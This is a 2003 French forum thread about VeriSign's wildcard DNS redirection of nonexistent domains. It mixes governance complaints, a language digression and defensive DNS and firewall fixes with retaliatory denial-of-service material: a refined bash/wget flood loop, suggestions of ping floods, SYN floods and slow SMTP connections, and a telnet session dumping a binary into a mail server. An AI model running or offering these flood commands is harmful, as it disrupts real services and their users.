On passe donc d'un système ou le serveur DNS dit que domaine n'existe pas, à un système ou il faut attendre un timeout pour ce rendre compte qu'un domaine n'existe pas. Personne n'a rien a y gagner même pas Verisign vu que leur machine ne sera jamais accessible (à moins qu'il arrive à aligner une bande passante supérieure à x% de tout internet, x correspondant à ceux qui se sont gourrés plus tous les mécontents qui se feront une joie je pense de flooder tout ça...)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par nano le 16 septembre 2003 à 18:26. Évalué à 1.
  
  je confirme, quelques adresses bidons sur mon naigateur se sont soldées par un timeout ... Ben alors, elle est ou la pub ?
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Gruik Man le 16 septembre 2003 à 19:19. Évalué à 1.
    
    Quel est ton FAI? Ils ont peut-être déjà mis une null-route sur le domaine en question. Avant, dans le vrai internet, quand tu faisais une résolution de nom sur un domaine inexistant, ça te renvoyait "domaine inexistant" (NXDOMAIN), et ça ne faisait pas de timeout. Si ça timeout, c'est sans doute un trou noir mis un place par ton FAI.
    
    Et un dig, ça donne quoi?
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Anonyme le 16 septembre 2003 à 18:28. Évalué à 1.
  
  Par contre ils recuperent de l'argent avec la pub de leur site, une liste des domaines libres les plus demandes, une liste d'addresses email valides ...
  En gros ca doit valloir largement le coup de payer de la bande passante vu l'argent que ca peux leur rapporter (et les possibilites d'espionages).
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par cyberyo le 16 septembre 2003 à 18:18. Évalué à -6.

n'importe quoi ...
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Mathias Bavay (site web personnel) le 16 septembre 2003 à 18:26. Évalué à 1.

Et si tout le monde laisse tourner un petit script:
wget -t 0 http://sdfkjhsdjkfhsdjkfh.com(...)
(on peut le mettre lui-meme en boucle infinie au cas ou ca passe), on va tous en taule en plus de donner du boulot a Verisign ?

Mathias
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par _alex le 16 septembre 2003 à 18:37. Évalué à 7.
  
  Je me demande si ça marche :
  Faire une page dynamique générant plein de liens vers des sites n'existant pas.
  Mettre la page dans un endroit connu, et important.
  Et s'arranger pour que cette page ait un pagerank élevée.
  Et laisser google agir...
  
  Bien sur la page peut être multipliée autant de fois que l'on souhaite.
  
  (désolé des combines des commerciaux comme ça me fout en rogne)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par N-Mi le 16 septembre 2003 à 18:38. Évalué à 1.
  
  (pompé sur Slashdot):
  
  while true; do for i in 1 2 3 4 5 6 7 8 9 0; do wget -O /dev/null `head -c 30 /dev/urandom | perl -pe 's/[^a-zA-Z]//ig'`.com >& /dev/null & done; echo -n . ; sleep 1; done
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par NebuchadnezzaR le 16 septembre 2003 à 19:04. Évalué à 2.
    
    while true; do for i in 1 2 3 4 5 6 7 8 9 0; do wget -O /dev/null `head -c 30 /dev/urandom | perl -pe 's/[^a-zA-Z]//ig'`.com >& /dev/null; done; echo -n . ; sleep 1; done
    
    Y'avais un & en trop.
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par NebuchadnezzaR le 16 septembre 2003 à 19:07. Évalué à 5.
    
    while true; do for i in `seq 0 9`; do wget -O /dev/null `head -c 30 /dev/urandom | perl -pe 's/[^a-zA-Z]//ig'`.com >& /dev/null; done; echo -n . ; sleep 1; done
    
    c'est même mieux comme ça.
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par ramzez le 16 septembre 2003 à 18:38. Évalué à 1.
  
  chez moi ça marche pas, il me télécharge un fichier et arrete
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Julien Wajsberg le 16 septembre 2003 à 19:46. Évalué à 2.
  
  chouette attend j'enregistre le nom de domaine, j'aurai plein de hits :))
# caches vont etre remplis de fausses urls

Posté par free2.org le 16 septembre 2003 à 18:58. Évalué à 10.

les serveurs de cache DNS (comme ceux des providers) vont bientot etre remplis d'urls bidons....
ils sont pénalisés par verisign alors qu'en fait ce sont eux qui font la grande majorité du boulot, et que verisign est juste là pour encaisser les $ ...

incroyable !
il est temps de se tourner vers des solutions alternatives à but non lucratif
- [^] # Re: caches vont etre remplis de fausses urls
  
  Posté par Rafael Pinilla le 16 septembre 2003 à 21:10. Évalué à 1.
  
  Il est probable qu'ils comptent sur les proxy pour délester la charge qu'occasionne cet afflux de requètes.
  
  Au moins en partie.
  
  Le pire, c'est que les requins vont se bousculer pour faire des affaires avec eux.
  
  Il est temps que l'ICANN les vire.
  - [^] # Re: caches vont etre remplis de fausses urls
    
    Posté par manatane le 17 septembre 2003 à 00:02. Évalué à 4.
    
    Le problème c'est qu'entre Verisign et l'ICANN je me demande lequel est le plus venal.
    Il n'y a qu'à se rappeler la transparence dont avait fait preuve l'ICANN (association à but non lucratif pourtant) pour montrer ses documents comptables, quand un membre de l'ICANN élu par les internautes en avait fait la demande => tribunal et encore le membre en question n'avait meme pas ete autorisé à divulguer ces informations qui devraient pourtant etre publiques.
    Bref je doute qu'on puisse faire confiance en l'ICANN qui est un espèce de truc créée par les US (association régie par la loi californienne c'est un comble pour un truc censé chapeauter entre autre l'Internic) pour controler l'énorme quantité de pognons que représente Internet...
# Ils ont cassé un service de MS ?

Posté par Tartine le 16 septembre 2003 à 19:21. Évalué à 5.

Alors c'est la guerre et ils sont morts.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Eric Brunet le 16 septembre 2003 à 19:21. Évalué à 6.

la vrai morale dans cette histoire est:
à quand des organismes INTERNATIONAUX ET A BUT NON LUCRATIFS pour gérer les fondements du net?!
D'ailleurs je crois que cela semble pas gagné d'avance:
http://fr.news.yahoo.com/030916/85/3edrb.html(...)

De plus, c'est pas eux qui avait déjà laissé la possiblité d'avoir des noms de domaines avec accents SANS l'autorisation de l'icann et encore moins la validation de ses specifications à l'ietf???

mais plus simplement, n'est ce pas une erreur de configuration de leurs serveurs "root" (qui sait ce serais hallucinant comme meme)??
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Boa Treize (site web personnel) le 16 septembre 2003 à 19:35. Évalué à 1.
  
  mais plus simplement, n'est ce pas une erreur de configuration de leurs serveurs "root"
  
  Non, le mail de VeriSign est clair à ce sujet, et ils indiquent même quelles méthodes ils utilisent et donnent des conseils aux autres mainteneurs de bases de données de noms de domaines.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Pascal Nowak le 16 septembre 2003 à 19:25. Évalué à 2.

Un domaine dont personne n'a parle. Les robots des moteurs de recherches ne vont pas vraiment apprecier. Ca risque meme de completement fausser les resultats de moteurs avec classement de type "pagerank" (google par ex.) ... Merci Verisign :(
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Matafan le 17 septembre 2003 à 04:10. Évalué à 5.
  
  Sur ce point particulier ça ne devrait pas poser de problème puisqu'ils ont un « robots.txt » ad hoc. Ils en parlent même dans leur « bestpractices.pdf », paragraphe 3.2.1.
# fondements de l'Internet

Posté par Olivier Jeannet le 16 septembre 2003 à 19:37. Évalué à -4.

C'est peut-être un détail, mais il est préférable de dire « l'Internet » tout comme on dit « le Web ».
Je ne sais pas pourquoi, "the Web" est resté "le Web" en français, mais "on the internet" a été traduit par "sur Internet" (au lieu de "sur l'Internet", logiquement), que je n'aime pas trop, ça ressemble à "sur TF1" comme si c'était un bête canal de réception.
- [^] # Re: fondements de l'Internet
 
 Posté par Gruik Man le 16 septembre 2003 à 20:00. Évalué à 0.
 
 En français, on a toujours dit "sur Internet" et pas "sur l'Internet", avant que les académiciens ne mettent leur grain de sel. Je vois mal pourquoi changer.
 
 [-1], HS
 - [^] # Re: fondements de l'Internet
 
 Posté par Guillaume G. le 16 septembre 2003 à 21:25. Évalué à 1.
 
 Question: tu dis « sur le Net » ou bien « sur Net » ? Réponse: tu dis « sur le Net ». Conclusion, il faut aussi dire « sur l'Internet » plutôt que « sur Internet ». Les Académiciens ne sont pas toujours à la masse.
 - [^] # Re: fondements de l'Internet
 
 Posté par Piksou le 16 septembre 2003 à 21:35. Évalué à 0.
 
 Tu dis bien France Telecom et les Télécom (ou les PTT)...
 - [^] # Re: fondements de l'Internet
 
 Posté par Larry Cow le 16 septembre 2003 à 21:50. Évalué à 2.
 
 Perso, je dis "le Net" (le réseau), mais "Internet" (nom propre).
 - [^] # Re: fondements de l'Internet
 
 Posté par iamkdo le 17 septembre 2003 à 01:59. Évalué à 3.
 
 Il faut dire 'ceci', il faut dire 'cela' ... Il dit ce qu'il veut, ce n'est pas l'académie qui fait la langue, c'est le peuple. Et le peuple emmerde les donneurs de leçons (notez que 'emmerder' est un mot bien Francais, de France, homologué, certifié et tout et tout).
 
 Non je -->[] pas, je reste.
 - [^] # Re: fondements de l'Internet
 
 Posté par Erwan le 17 septembre 2003 à 07:38. Évalué à 2.
 
 Une langue vivante n'a jamais ete logique, et les academiciens ne defendent pas du tout la logique de la langue francaise.
 
 En Afrique on va acheter de l'essence dans une "essencerie", ce qui est nettement plus logique qu'aller a la "station service", et pourtant les academiciens considerent ca comme "un dialecte local".
 - [^] # Re: fondements de l'Internet
 
 Posté par Gilles Crebassa le 17 septembre 2003 à 09:03. Évalué à 0.
 
 On en vient au probléme des septente et des soixante-dix.
 Bien avant , il n'y avait que dix mois, pas de janvier et pas de fevrier (avant le calandrier gregorien). donc le moi de septembre etait le septiéme mois , comme nonente pour quatre-vingt-dix , pour novembre.
 Peut-etre certain y verront un rapprochement maintenant.
 Prenons ceci pour la langue francaise alors que en suisse , quebec , belgique , on dit sous septente et nonente ? où est l'erreur.
 
 Il y en a plein de toute facon.
 
 [^] # Re: fondements de l'Internet
 
 Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 10:53. Évalué à 0.
 
 Houlala le pétage de plombs... 10 mois dans l'année... Et 300 jours par an, c'est ça ? Voilà la solution pour sauver les vieux : ajoutons deux nouveaux mois, passons à 720 jours par an !
 
 Ça fait bien longtemps qu'il y a douze mois dans l'année (avant le calendrier Julien qui précédait le calendrier Grégorien... Oh et puis il y avait les Égyptiens aussi). Ce qui a changé, c'est la position du début de l'année. « Avant » (je ne sais pas quand), c'était au mois de mars (le printemps, etc.), et donc septembre était bien le septième mois de l'année. Depuis, quelqu'un a décidé que ce serait en janvier, c'est tout.
 
 Par ailleurs, on ne dit pas septente ou nonente, ni même septante ou nonante en Suisse, au Québec et en Belgique. En Belgique notamment, si je ne m'abuse, on dit soixante-dix (ou quatre-vingt-dix, enfin on n'utilise pas les deux -ante). C'est au Québec que l'on emploie les deux, et en Suisse je sais pas. (Bien sûr, si vous avez des corrections à faire ou des précisions à apporter, n'hésitez pas.)
 
 [^] # Re: fondements de l'Internet
 
 Posté par Sha0 le 17 septembre 2003 à 11:10. Évalué à 4.
 
 non non en Belgique, on dit bien et nonante et septante ;)
 
 [^] # Re: fondements de l'Internet
 
 Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 15:42. Évalué à 1.
 
 Bon, ben je connais au moins deux belges qui ne disent pas septante et nonante (et qui m'ont affirmé qu'ils étaient loin d'être les seuls).
 
 [^] # Re: fondements de l'Internet
 
 Posté par undeuxtroisout le 17 septembre 2003 à 17:39. Évalué à 3.
 
 +/- 60% des Belges disent zeventig en negentig.
 <1% des Belges disent siebzig und neunzig.
 +/-40% des Belges (les francophones) disent effectivement septante et nonante.
 
 Les Belges qui disent soixante-dix sont des néerlandophones qui ont appris le français tel qu'il est parlé en France.
 
 Moi je préfère dire 70 ;-)
 
 [^] # Re: fondements de l'Internet
 
 Posté par Buf (Mastodon) le 17 septembre 2003 à 11:22. Évalué à 3.
 
 En Suisse, on utilise bien septante et nonante. Dans certaines région (principalement le canton de Vaud) on utilise aussi huitante pour quatre-vingts.
 
 [^] # Re: fondements de l'Internet
 
 Posté par Pierre Jarillon (site web personnel) le 17 septembre 2003 à 14:00. Évalué à 6.
 
 La numération par 10 et 20 est une vestige de l'ancienne façon de compter.
 Les Belges et les Suisses ont adopté complètement la parler les envahisseurs romains. La France a partiellement résisté et mélangé les deux systèmes.
 Le basque a conservé intact l'ancien système : 10, 20, 20+10, 2x20, 2x20+10, 3x20, 3x20+10, 4x20, 4x20+10
 On retouve à partir de 70 le système français. Par exemple 70 se dit en basque : hiruetan hogoi ta hamar (hiru=3, hogoi=20, hamar=10).
 
 [^] # Commentaire supprimé
 
 Posté par Anonyme le 17 septembre 2003 à 18:46. Évalué à 6.
 
 Ce commentaire a été supprimé par l’équipe de modération.
 
 [^] # Re: fondements de l'Internet
 
 Posté par Benjamin Michotte le 18 septembre 2003 à 09:13. Évalué à 2.
 
 voire octante pour ceux qui ont pas tout compris :)
 
 [^] # Re: fondements de l'Internet
 
 Posté par Cyril le 18 septembre 2003 à 13:22. Évalué à 1.
 
 ... par contre, en Suisse, pas partout, pour 80 en dis aussi quatre-vingt.
 moi même j'ai jamais compris pourquoi.
 - [^] # Re: fondements de l'Internet
 
 Posté par Gniarf le 16 septembre 2003 à 23:24. Évalué à 1.
 
 non. merci de ne pas prendre son propre cas pour une généralité avec des "on".
 
 et le débat n'est pas récent, j'ai dû voir un barbu râler à ce sujet en 96. c'était Christian Huitema. j'ai oublié ce qu'il avait choisi, mais il avait raison. Internet - ou l'Internet, enfin, le machin - a bien changé depuis.
 
 pour moi on peut dire les deux, ça dépend de quoi on parle. comme pour Linux ou GNU/Linux.
 
 (PS - joli troll)
 - [^] # Re: fondements de l'Internet
 
 Posté par Olivier Jeannet le 16 septembre 2003 à 23:47. Évalué à 1.
 
 En français, on a toujours dit "sur Internet" et pas "sur l'Internet", avant que les académiciens ne mettent leur grain de sel. Je vois mal pourquoi changer.
 
 Et bien non, on n'a pas toujours dit "sur internet", figure-toi. Rien à voir avec les académiciens, dont je ne connais pas la recommandation sur ce sujet. Ce n'est pas parce que quelque journalistes ont lancé l'usage (surprenant comme je l'ai expliqué) que ça doit être retenu pour norme. Le commentaire de "Guillaume G.", en réponse au tien, est très pertinent.
 
 Et l'argument "on ne va pas changer", franchement il ne va pas bien loin. Il me fait penser à ceux qui sont contents sous Windows et qui ne veulent rien changer, ou aux webmestres qui ont des sites IE-only ("à quoi bon, MS/IE/Office sur 95% des machines, etc").
 - [^] # Re: fondements de l'Internet
 
 Posté par voutch le 17 septembre 2003 à 01:00. Évalué à 1.
 
 En américain (les inventeurs tout de même) c'est THE INTERNET, donc la traduction est évidente.
 
 D'ailleurs c'est "le réseau internationnal", donc l'internet est la forme correct.
 Mais bon, on peut dire ce qu'on veux, personne ne parle anglais en france !
 
 Il n'y a qu'a dire le réseau, au moins c'est du bon francais.
 - [^] # Re: fondements de l'Internet
 
 Posté par Erwan le 17 septembre 2003 à 07:41. Évalué à 1.
 
 1) On est pas oblige de prendre une traduction rigoureuse des americains, entre francais on appelle ce reseau comme on veut, comme tu le dis finalement
 
 2) Ce n'est pas "le reseau international" (avec 3 n et pas 4) mais "les reseaux interconnectes". Donc tu peux l'appeller "les Internet" si ca te plait.
 
 [^] # Re: fondements de l'Internet
 
 Posté par grmbl le 17 septembre 2003 à 18:38. Évalué à 1.
 
 >mais "les reseaux interconnectes".
 
 Ou plustôt "le système d'interconnexion des réseaux".
 
 [^] # Commentaire supprimé
 
 Posté par Anonyme le 17 septembre 2003 à 18:52. Évalué à 3.
 
 Ce commentaire a été supprimé par l’équipe de modération.
 - [^] # Re: fondements de l'Internet
 
 Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 10:54. Évalué à 0.
 
 Mais bon, on peut dire ce qu'on veux, personne ne parle anglais en france !
 
 Ben si, moi.
 - [^] # Re: orthographe
 
 Posté par Stéphane Salès le 17 septembre 2003 à 10:11. Évalué à 2.
 
 Serait-il possible, que lorsque la discussion s'engage sur l'orthographe, sur vi/emacs ou sur tout sujet aussi intéressant qui a un rapport avec la news de départ plus qu'évident (hum hum), vous changiez le sujet de vos commentaires, ou qu'au moins vous y placiez une balise, juste histoire que les gens qui ont juste envie d'avoir des infos sur la news puisse passer au sujet suivant.
 D'avance merci.
 (P.S: ce genre de civilité serait, amha, bien plus rentable, que le système de vote actuel qui interdit de voter à des gens comme moi qui ont malgré tout une certaine ancienneté vis à vis de ce site mais qui n'ont pas le temps de poster au moins une fois tous les quinze jours)
 - [^] # Re: orthographe
 
 Posté par Olivier Jeannet le 17 septembre 2003 à 12:01. Évalué à 0.
 
 Serait-il possible, que lorsque la discussion s'engage sur l'orthographe, [...], vous changiez le sujet de vos commentaires
 
 Ton commentaire est mal à propos dans le cas présent, vu que j'ai exprès mis un titre différent de celui de la nouvelle (par civilité justement). Je te le rappelle puisqu'il t'a échappé : « fondements de l'Internet » (j'ai souligné les 2 lettres manquantes).
 
 Par ailleurs, j'en profite pour signaler que la nouvelle parue aujourd'hui à 8h du matin porte un titre utilisant la forme propre : « Le rôle des états dans la gestion de l'Internet en question », comme quoi je ne suis pas le seul à prôner cet usage.
 - [^] # Re: orthographe
 
 Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 15:44. Évalué à 1.
 
 Ouais, et moi je ne suis pas le seul à dire Internet. Mais je ne prône pas cet usage, et je ne gonfle pas les gens sur leur choix de langage (enfin, dans ce cas ci).
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Jeff le 16 septembre 2003 à 19:39. Évalué à 1.

Ah,
si j'essaye ça: gnougnoug.quekquek.com (dns de free)
je tombe sur la fameuse page de verinaze, c'est donc pas un hoax!

"We didn't find: 'gnougnoug.quekquek.com'
There is no Web site at this address."

Par contre ca ne marche que pour les tld .com .net et pas les .org

ça serait bien qu'on leur foute un coup de pied au c*l et qu'un organisme neutre gère tout ça!

Bon, un volontaire pour mener le soulèvement? ;)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par gloups le 16 septembre 2003 à 22:48. Évalué à 1.
  
  Une floppée de messages à
  - l'ICANN en guise de protestation ???
  - Faire pression sur nos ISP ???
  
  Il va falloir argumenter...
  Bref, le même topo que pour les brevets mais avec des marketdroïds sans scrupules ni aucune étique cette fois...
  
  Mais.... dans quel monde vivons nous ;-( ?????
# J'aime bien le slogan

Posté par Delahaye Matthieu le 16 septembre 2003 à 19:41. Évalué à 6.

Vu sur leur site web:
http://www.verisign.com/(...)

Verisign - The Value Of Trust

On a pas la meme definition
- [^] # Re: J'aime bien le slogan
  
  Posté par un_brice (site web personnel) le 16 septembre 2003 à 23:41. Évalué à 3.
  
  En fait si: un organisme de confiance est un organisme auquel tu confère les moyens de divulguer tes secrets (cf "informatique de confiance" (aka Pd)). Pas un organisme fiable.
# Aide pour Wikipédia

Posté par Youssef Oualmakran (site web personnel) le 16 septembre 2003 à 19:48. Évalué à 4.

Bonjour,

Une bonne âme aurait l'amabilité d'aider à la rédaction de http://fr.wikipedia.org/wiki/VeriSign(...) pour faire comprendre le fonctionnement et les enjeux à un public plus large.

Merci d'avance,

Youssef
- [^] # blockage par ipchains
  
  Posté par boboss le 16 septembre 2003 à 20:19. Évalué à 3.
  
  Pour ceux qui voudraient bloquer les acces vers verisign avec le (bon) vieux ipchains:
  
  ipchains -A forward -s 0.0.0.0/0.0.0.0 -d 64.94.110.11 -j REJECT
  ipchains -A input -s 0.0.0.0/0.0.0.0 -d 64.94.110.11 -j REJECT
  ipchains -A output -s 0.0.0.0/0.0.0.0 -d 64.94.110.11 -j REJECT
  
  Ainsi, sur votre machine locale, ou sur les pc connectés derrière votre routeur, on obtientra par le ping un destination port unreachable, ou Connexion refusée par mozilla...
  
  c'est du provisoire, forcement...
  - [^] # Re: blockage par ipchains
    
    Posté par vazco le 16 septembre 2003 à 20:33. Évalué à 4.
    
    Je suggère une Insertion en début de chaîne au lieu d'un Ajout en fin.
    
    Sinon, il y a fort à parier qu'une autre règle aura la préséance.
    
    Et input ou forward suffit. Inutile de mettre les deux.
  - [^] # Re: blockage par ipchains
    
    Posté par ramzez le 16 septembre 2003 à 21:56. Évalué à 1.
    
    comme il a déjà été dit 100 fois, ça ne fera qu'émettre un timeout et non pas un unknow host comme ça devrait
    donc le probleme reste entier
    - [^] # Re: blockage par ipchains
      
      Posté par vazco le 16 septembre 2003 à 23:20. Évalué à 3.
      
      C'est un REJECT et pas un DROP. Il y aura donc un message icmp émis pour informer que l'hôte n'est pas accessible. Donc pas de timeout.
      
      Je ne sais pas où ça a déjà été dit mais il aurait été mieux de se taire 100 fois.
      
      L'erreur reçue ne sera pas "unknown host" et on fait que contourner les conséquences du problème, mais je serais curieux de savoir ce que tu suggères ?
      - [^] # Re: blockage par ipchains
        
        Posté par ramzez le 17 septembre 2003 à 15:50. Évalué à 2.
        
        excuse moi je n'ai pas été très correct
        mais ce que je voulais dire, c'est qu'on obtenait toujours pas un unknow host
        ici on obtient rapidement un operation not permitted, ce qui est déjà pas mal (parce qu'on attend pas)
        
        mais ce qui semble être la meilleur solution reste l'application du patch sur les serveurs dns (en espérant que les fai le fasse)
        
        enfin la meilleur solution serait plutot qu'on file enfin ce boulot à un organisme indépendant qui n'a pas pour seul but de faire du pognon mais qui souhaite avant tout satisfaire ses clients ....
        
        100 excuses ;)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par nojhan (site web personnel, Mastodon) le 16 septembre 2003 à 20:10. Évalué à 2.

N'est-ce pas l'Internet Society qui "donne" le droit à VeriSign de gérer tout ça ?
Quel est leur pouvoir de décision sur ce genre de pratiques ?
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Alvarez le 16 septembre 2003 à 22:33. Évalué à 3.
  
  C'est l'ICANN et ils ont un formulaire pour se plaindre: http://reports.internic.net/cgi/registrars/problem-report.cgi(...) même s'ils ne garantissent pas le suivi, ca peut peut-être les faire réagir.
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par cumulus le 16 septembre 2003 à 20:35. Évalué à 1.

Je ne comprends pas : pourquoi ont-ils le droit de faire ça ?
- [^] # argent, profit et corruption
  
  Posté par free2.org le 16 septembre 2003 à 23:56. Évalué à 0.
  
  c'est une entreprise qui veut faire un max de blé (comme la plupart des entreprises)
  
  et ICANN est controlé par des entreprises ou actionnaires qui veulent du blé aussi (et qui auront leur part du gateau d'une manière ou d'une autre si Verisign veut garder son monopole)
  
  car les campagnes électorales sont financées par ... (bravo, vous avez deviné !)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par doe le 16 septembre 2003 à 20:46. Évalué à 2.

ping -f ?
ca pourrait etre une solution ??
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Laurent Laborde (site web personnel) le 16 septembre 2003 à 21:10. Évalué à 2.
  
  C'est ton FAI qui va t'aimer :)
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par ramzez le 16 septembre 2003 à 22:05. Évalué à 1.
    
    ouaip
    d'ailleurs ils ne répondent pas aux pings
    sinon y-a ça :
    http://www.google.com/search?q=synflood&sourceid=mozilla-search(...)
    :D
    mais le fai va encore faire la gueule
    donc la solution avec wget reste la meilleur (cf plus haut)
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par analogue o/ (site web personnel) le 16 septembre 2003 à 21:10. Évalué à 2.
  
  Ils ont fermé la porte
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Yogi le 16 septembre 2003 à 21:42. Évalué à 2.

en tout cas c'est relou !

comme leurs machines sont a plat ... on attend 3 plombes pour savoir si un serveur lag ... ou est mort :/

ca fais pas mal de temp perdu tout ça !

et je suis en ADSL môa ... mais les pauvres RTC, ils vont encore plus souffrir.
# About Verisign, juste pour le fun

Posté par Yann le 16 septembre 2003 à 22:00. Évalué à 1.

pompé sur leur site :

[...]
VeriSign Inc. (NASDAQ: VRSN) delivers critical infrastructure services that make the
Internet and telecommunications networks more intelligent, reliable, and secure.
Every day VeriSign helps thousands of businesses and millions of consumers
connect, communicate, and transact with confidence.
[...]
- [^] # Re: About Verisign, juste pour le fun
  
  Posté par Romeo le 16 septembre 2003 à 22:02. Évalué à 1.
  
  :)
- [^] # Re: About Verisign, juste pour le fun
  
  Posté par Sylvain Rochet (site web personnel) le 20 septembre 2003 à 20:13. Évalué à 1.
  
  No comments....
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par Tutur le 16 septembre 2003 à 22:06. Évalué à 1.

Est ce qu'il y a un patch pour bind, named, etc.. enfin les serveurs DNS afin que tout nom de domaine pointant vers 64.94.110.11 soit automatiquement ignoré et considéré comme inexistant?
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par ramzez le 16 septembre 2003 à 22:13. Évalué à 2.
  
  y-a un patch pour djbdns, mais pas encore pour bind à priori
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par William Steve Applegate (site web personnel) le 17 septembre 2003 à 00:18. Évalué à 4.
    
    Tututut : [http://imperialviolet.org/dnsfix.html(...)]. Solutions pour Bind, PowerDNS, etc.
    Envoyé depuis mon PDP 11/70
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par scoubid00 le 17 septembre 2003 à 10:04. Évalué à 1.
  
  à mettre dans ton named.conf :
  
  options {
  bogus-wildcards { 64.94.110.11; };
  bogus-wildcard-response "nxdomain";
  };
  
  a++
  Olivier.
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par Prosper le 17 septembre 2003 à 12:59. Évalué à 2.
    
    mmm tu sors ca d'ou ? , parce que j ai beau cherché je trouve pas ces options dans la doc de bind.
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par choocroot le 17 septembre 2003 à 13:14. Évalué à 5.
      
      Mouarf, apparemment c'est juste une proposition de syntaxe :
      - http://groups.google.com/groups?hl=en&lr=&ie=UTF-8&oe=U(...)
      
      >
      > [...] Unfortunately I'm not capable of coding such a
      > patch without substantial studying of the bind sourcecode :-/
      >
      > Proposed entry in named.conf:
      >
      > options {
      > bogus-wildcards { 64.94.110.11; };
      > bogus-wildcard-response "nxdomain";
      > };
      >
      
      Il va falloir apprendre à lire ...
      
      Le «vrai» patch de l'ISC pour Bind est l'ajout de la declaration «delegation-only» à mettre dans une zone pour l'empecher de contenir des réponses de type `A' :
      - http://www.isc.org/products/BIND/delegation-only.html(...)
# Re: VeriSign détruit l'un des fondements d'Internet

Posté par vincent LECOQ (site web personnel) le 16 septembre 2003 à 22:17. Évalué à 2.

et si j'envoie un mail avec en piece jointe les 3 iso de la mandrake RC2 que je vient de télécharger à un destinataire inexistant ? je les fait chier tout en respectant la loi puisque je ne les vise par directement, c'est eux qui me récupèrent sans mon consentement ...
et vlan !
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par ramzez le 16 septembre 2003 à 22:19. Évalué à 2.
  
  il ne récupère pas le contenu du mail, tu vas t'emmerder pour rien
  il récupére juste ton adresse email (enfin c'est le bruit qui court
  d'ailleurs ils ont fermé le port 80 et pas le 25 donc j'imagine qu'il y a une raison à ça !!
- [^] # Re: VeriSign détruit l'un des fondements d'Internet
  
  Posté par Mathieu LESNIAK (site web personnel) le 16 septembre 2003 à 22:20. Évalué à 1.
  
  passera pas....
  leur serveur mail renvoie un code 550 "User domain does not exist"", quelque soit le destinataire.
  - [^] #
    
    Posté par Francois Revol (site web personnel) le 16 septembre 2003 à 23:01. Évalué à -1.
    
    par contre je me demande s'ils sont pas en openrelay.
  - [^] # Re: VeriSign détruit l'un des fondements d'Internet
    
    Posté par _alex le 16 septembre 2003 à 23:12. Évalué à 6.
    
    euh ça marche avec un username de 600Mo ?
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par vincent LECOQ (site web personnel) le 17 septembre 2003 à 11:17. Évalué à 1.
      
      ça il faut que j'essaye par-contre ...
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Boa Treize (site web personnel) le 17 septembre 2003 à 15:53. Évalué à 2.
        
        Un truc simple qui peut bien faire chier, c'est tout simplement d'ouvrir la connexion et de la laisser ouverte le plus longtemps possible, soit en ne faisant rien soit en expédiant les donnée ultra-lentement.
    - [^] # Re: VeriSign détruit l'un des fondements d'Internet
      
      Posté par Keos le 17 septembre 2003 à 12:35. Évalué à 2.
      
      Lol, je crois pas que la rfc permette un username si gros....faudrais verifier....
      Mais bon si c'était le cas ( ca m'etonerais enormement) vos FAI ainsi que vos prestataires de service mail ( souvent les memes) vont sacrément faire la gueule ;)
      - [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Gruik Man le 17 septembre 2003 à 12:49. Évalué à 1.
        
        Suffit d'utiliser un mailer sur sa machine, sans smarthost (ou une connexion directe sur le SMTP de chez Verisign, ça revient au même)
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par Keos le 17 septembre 2003 à 12:54. Évalué à 2.
        
        Je dirais meme plus...
        un mailer "sauce perso" qui accepte un tel username
        
        [^] # Re: VeriSign détruit l'un des fondements d'Internet
        
        Posté par B. franck le 17 septembre 2003 à 16:17. Évalué à 1.
        
        je crois que certains ont déjà essaye' depuis longtemps:
        
        test]$ telnet 64.94.110.11 25
        Trying 64.94.110.11...
        Connected to 64.94.110.11.
        Escape character is '^]'.
        220 snubby4-wceast Snubby Mail Rejector Daemon v1.3 ready
        helo scrubby
        250 OK
        you suck
        250 OK
        mail from: tamere_en_short_a_magalouf.verisign.com
        550 User domain does not exist.
        mail from: tamere_en_short@magalouf.verisign.com
        250 OK
        rcpt to:^?ELF^A^A^A^@^@^@ ....
        ...
        ...
        ....^D^@^@.^C^@^@¬^B
        221 snubby1-wceast Snubby Mail Rejector Daemon v1.3 closing transmission channel
        Connection closed by foreign host.
        
        ps: oui oui c'est bien le binaire de bash que vous avez reconnu. ;)
